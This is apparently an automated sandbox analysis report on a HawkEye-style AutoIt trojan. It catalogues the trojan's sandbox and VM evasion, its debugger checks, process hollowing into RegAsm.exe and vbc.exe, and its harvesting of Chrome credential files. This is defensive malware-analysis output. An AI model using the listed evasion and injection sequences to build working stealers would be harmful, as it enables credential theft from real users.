Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RegAsm.exe, 00000005.00000002.933559504.00000000029C3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe, 00000005.00000002.933559504.00000000029C3000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe TID: 6120 Thread sleep count: 419 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe TID: 6120 Thread sleep count: 6499 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe TID: 6120 Thread sleep time: -64990s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6784 Thread sleep count: 181 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6784 Thread sleep time: -181000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5476 Thread sleep time: -120000s >= -30000s Jump to behavior
Sleep loop found (likely to delay execution)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Thread sleep count: Count: 6499 delay: -10 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040978A
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Window / User API: threadDelayed 419 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Window / User API: threadDelayed 6499 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Thread delayed: delay time: 60000 Jump to behavior
Source: bhv7420.tmp.6.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20211210T130248Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=181bf87b454c47dfab7d24a7ffc2f2d2&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1291370&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1291370&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: RegAsm.exe, 00000005.00000002.933194657.0000000000ACE000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0041829C memset,GetSystemInfo, 6_2_0041829C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen, 6_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408CAC FindFirstFileW,FindNextFileW,FindClose, 6_2_00408CAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen, 9_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00408CAC FindFirstFileW,FindNextFileW,FindClose, 9_2_00408CAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen, 18_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00408CAC FindFirstFileW,FindNextFileW,FindClose, 18_2_00408CAC

Anti Debugging:

barindex
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040978A
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_004443B0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_3_00EB00BE mov esi, dword ptr fs:[00000030h] 1_3_00EB00BE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_3_00EB00BE mov esi, dword ptr fs:[00000030h] 1_3_00EB00BE
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00F25CCC
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00F25CCC
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F1A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00F1A395

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 700000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 700000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_3_00EB00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread, 1_3_00EB00BE
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 700000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 4EA008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3C7008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 27E008 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3C7008 Jump to behavior
.NET source code references suspicious native API functions
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 5.0.RegAsm.exe.700000.1.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 5.0.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 5.2.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp1EB3.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp2C9A.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp39A1.tmp Jump to behavior
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933942080.0000000002B31000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.934441538.0000000001C40000.00000002.00020000.sdmp, RegAsm.exe, 00000005.00000002.933405986.0000000000F90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00F250D7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004083A1 GetVersionExW, 6_2_004083A1

Stealing of Sensitive Information:

barindex
Yara detected MailPassView
Source: Yara match File source: 5.3.RegAsm.exe.427b8f2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0345.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.4a0834a.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.4a0834a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42235a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.427b8f2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42235a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42238ed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Yara detected HawkEye Keylogger
Source: Yara match File source: 5.0.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.RegAsm.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.932841819.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934551459.0000000003152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.936778010.0000000004132000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.698490007.0000000000702000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.697292626.0000000000702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.933574671.00000000029C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934765521.00000000031EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.934844447.000000000328C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe PID: 2228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 5.2.RegAsm.exe.64d5bd0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.6b37088.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0345.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0345.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42238ed.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.49b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42235a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.64d5bd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.68066c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.RegAsm.exe.42235a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RegAsm.exe.6b37088.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
